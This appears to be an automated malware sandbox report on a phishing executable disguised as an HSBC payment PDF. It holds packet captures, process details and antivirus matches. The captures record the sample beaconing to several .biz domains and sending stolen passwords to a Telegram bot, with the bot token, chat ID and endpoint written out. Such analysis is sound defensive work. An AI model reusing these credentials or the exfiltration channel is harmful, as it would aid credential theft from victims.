                                                                                                                                                                              Data Ascii: JF?E'[s6;?h_{DqAj0fQQ7PqNP(:U=4`pdK)QzYj]UY3pi8(]vo9PML1]/lZbryHQLmaH26Sr1^9 78ZwC*"|fso+


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.54979282.112.184.197801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:52.879203081 CET355OUTPOST /kdexhblwxghmj HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:52.879223108 CET850OUTData Raw: d6 11 7e 8b 57 4c cf d5 46 03 00 00 f7 e2 a2 53 9c a7 51 33 fe 46 f3 72 79 b6 be e6 f0 83 b0 8b f5 61 a6 4f f2 d2 76 80 27 7c 6c 58 b8 e1 d2 d4 16 a2 16 31 05 e0 0a a8 87 eb a0 3c a5 67 ad 64 f7 8f d1 ba 7c 7b 39 36 dd 79 71 ba 68 29 87 5b 04 f7
                                                                                                                                                                              Data Ascii: ~WLFSQ3FryaOv'|lX1<gd|{96yqh)[wQW:)T|uP'8=?Gcc9QDMRX12`4x"g,<_0vev|e#t<Gg}l427f)(T]bC


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.54984482.112.184.197801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:27:16.080837011 CET353OUTPOST /cfsmnhjm HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:27:16.080857038 CET850OUTData Raw: 65 2c 53 16 1b 54 41 62 46 03 00 00 5a 65 16 b4 7b 32 c7 cf 0b 80 0e 70 4d b2 b5 11 18 1a 64 bc 37 5e b5 e3 1b 49 53 b6 7b fd 13 86 8d 9b 6e 4d 8f dd 46 4d 11 71 7c 0c e0 91 b8 85 35 4c b9 bb 99 4b e8 89 db e5 bb f7 68 08 38 e1 10 24 18 c9 e1 5f
                                                                                                                                                                              Data Ascii: e,STAbFZe{2pMd7^IS{nMFMq|5LKh8$_`Wma"LOrbSGJ}_ItdMPfwT M{qVJi5SKbc6&BUuk^Ux8A3\$`~8_Z\Vg}c,q


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.54989582.112.184.197801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:27:38.123414993 CET346OUTPOST /o HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:27:38.132839918 CET850OUTData Raw: 70 e6 95 06 2a 84 91 ca 46 03 00 00 03 64 0e c4 8c 81 0f 26 d1 11 4f e0 7e 6f 7f ba 9e a2 e3 3f de 14 e3 c0 89 9b 4f 5e bd 72 35 e0 c2 7b ab fa 83 62 17 c9 9a 5f e5 5d 38 65 23 ae de 2e 8b 39 e0 6e 24 6e e6 f3 b1 73 1d 71 e1 ae ff ce 9e 99 0c aa
                                                                                                                                                                              Data Ascii: p*Fd&O~o?O^r5{b_]8e#.9n$nsqzJkY&0r "9\N }S-UKv0F:u:0DDFr^ImBoBYsFq`dH@"<eRx bxFaf")w9|hf


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.54994647.129.31.212801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:28:00.709965944 CET347OUTPOST /vtfq HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:28:00.709983110 CET850OUTData Raw: 23 ed 5e 49 bf eb 2f be 46 03 00 00 e3 04 58 5c 9a e5 b0 3b b6 e5 bf ba 1e 12 c6 e6 fc 96 55 f2 16 95 2f d3 e9 45 31 67 87 2d 8d 88 a4 60 ec 6e 76 48 f5 1d dc 1c 0c 20 d6 bf 9f a2 93 61 47 18 a4 fd 7c 97 38 2e 6b d0 41 53 34 4e 62 8f 80 0a ef a8
                                                                                                                                                                              Data Ascii: #^I/FX\;U/E1g-`nvH aG|8.kAS4Nb}WhQnUt.8~?#|7CwF#EGq2P;7Z5Cm.eJS8\3;+yf?W1h80Is/,(4-;t|1rLvXlB
                                                                                                                                                                              Dec 11, 2024 09:28:02.771852016 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:28:02 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=12f350b9bec4ba8e5b30ae20808e81af|8.46.123.175|1733905682|1733905682|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.2.54995213.251.16.150801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:28:04.372708082 CET344OUTPOST /pn HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:28:04.372839928 CET850OUTData Raw: 09 4d 9b cf 89 4e 54 b6 46 03 00 00 05 14 fc fc 6b b4 a0 78 3c 49 3a f9 f7 32 c6 19 8b 02 bc b8 3c e5 d4 0f 09 4f 91 3c 20 59 35 7d f9 ff 21 e2 9c 77 48 61 78 c3 22 3f 03 56 88 9f 00 17 12 fb 63 b9 c2 77 04 16 d3 a6 9a 56 ba 0b 55 85 d5 cb a7 5b
                                                                                                                                                                              Data Ascii: MNTFkx<I:2<O< Y5}!wHax"?VcwVU[y6P|OOvG/|W\l.E'IEQ7]XX\v~U(.)A?OFOKQD@(yjXtri@a6D_uw^q
                                                                                                                                                                              Dec 11, 2024 09:28:06.443178892 CET410INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:28:06 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=6ac8f14eccc2f514944d2ec025e46dde|8.46.123.175|1733905686|1733905686|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.2.54996344.221.84.105801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:28:07.209919930 CET357OUTPOST /eglmpsrvxnyx HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:28:07.209964037 CET850OUTData Raw: 9b c8 c0 0e 73 8c d7 df 46 03 00 00 72 46 11 01 31 91 72 d7 91 99 c7 45 88 86 3d 03 92 3f 1c dd 01 30 ba 49 d1 bc da 37 b6 a4 a6 55 97 e6 1f ea c3 00 7e f1 59 8e 80 b6 bc 43 f3 37 77 ec f1 85 00 8d 97 00 cb 37 e6 bd 88 37 61 2b 85 d3 27 ad 58 67
                                                                                                                                                                              Data Ascii: sFrF1rE=?0I7U~YC7w77a+'Xg$^\ZN@b>|EL"p(BWY: DV0E>f7O=|(AwJ}?:-fM'MeDH7kn|I;wO;Oq\ji|X'1Oms?,
                                                                                                                                                                              Dec 11, 2024 09:28:08.309787989 CET413INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:28:08 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=56e256e8e8cd5447e37689be979e9ccb|8.46.123.175|1733905688|1733905688|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.2.54996418.141.10.107801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:28:09.271538973 CET349OUTPOST /lqpvpf HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: vcddkls.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:28:09.271564960 CET850OUTData Raw: 9b e6 af 86 de ef 5d 5e 46 03 00 00 d8 24 6a 61 2a 3e bb 46 d1 59 ae 2c 12 3c 2e a2 1f 56 39 8a c7 cc 85 23 a8 6f a2 0b 2b 13 6b ec 21 67 f0 ab 7f ce 63 ed 4b 74 bd ea b8 66 3b 9f bf f3 8e 43 61 44 8b 77 4e db e3 bc 0c ed c7 90 ab 59 ae 31 c4 cb
                                                                                                                                                                              Data Ascii: ]^F$ja*>FY,<.V9#o+k!gcKtf;CaDwNY1W{*61.CAH4![-cOg*"7W@dNa&pD$U-yUtS;Jdfm"-l3:rn]{l
                                                                                                                                                                              Dec 11, 2024 09:28:11.355875969 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:28:10 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=83ab5ff6b435ed5e0b4df9f59e5e2547|8.46.123.175|1733905690|1733905690|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549711172.67.177.1344437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-11 08:26:16 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-12-11 08:26:16 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:16 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                              Age: 84899
                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2FOG7DrKx%2B2Yv7Ik2mtDvh9Bb0YQRzlj5oZfnjWRz6cgYsmnqKhZucLw75QXdfBZhsId8KRhPj%2BaMPui124KCHGr9l%2F%2FGO9hTNjl8lomoBfbAHcI%2FEMN2ADH9VIz7AG0qpTgJl4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f0416bdad8218b8-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1569&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1763285&cwnd=186&unsent_bytes=0&cid=f697564e67ac05dd&ts=458&x=0"
                                                                                                                                                                              2024-12-11 08:26:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.549716149.154.167.2204437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-11 08:26:23 UTC296OUTPOST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1
                                                                                                                                                                              Content-Type: multipart/form-data; boundary================8dd19939553a042
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Content-Length: 1090
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-12-11 08:26:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 39 33 39 35 35 33 61 30 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: --===============8dd19939553a042Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                                                              2024-12-11 08:26:24 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:24 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 516
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2024-12-11 08:26:24 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 39 30 35 35 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74
                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":1123,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1733905584,"document":{"file_name":"Userdata.txt","mime_t


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:03:26:04
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'587'200 bytes
                                                                                                                                                                              MD5 hash:4BD5AB8C1D6EB0D7B601863A74471CF3
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:03:26:05
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'445'888 bytes
                                                                                                                                                                              MD5 hash:9244278F3A4B451378B09E3B314A4B1A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:03:26:05
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\alg.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'381'376 bytes
                                                                                                                                                                              MD5 hash:2AF371D31DE2620D08F24582BCC94F36
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:138'056 bytes
                                                                                                                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:174'408 bytes
                                                                                                                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                              Commandline:
                                                                                                                                                                              Imagebase:
                                                                                                                                                                              File size:154'952 bytes
                                                                                                                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:03:26:06
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'348'608 bytes
                                                                                                                                                                              MD5 hash:FEBB8A1C8444E585D00E9798A241F535
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:03:26:08
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'242'624 bytes
                                                                                                                                                                              MD5 hash:B19D2C88C8C42BA1F4C83060C439AAFE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:03:26:09
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:2'354'176 bytes
                                                                                                                                                                              MD5 hash:AB3EAE016DCC7F0026DB2D4EF2BCCB01
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

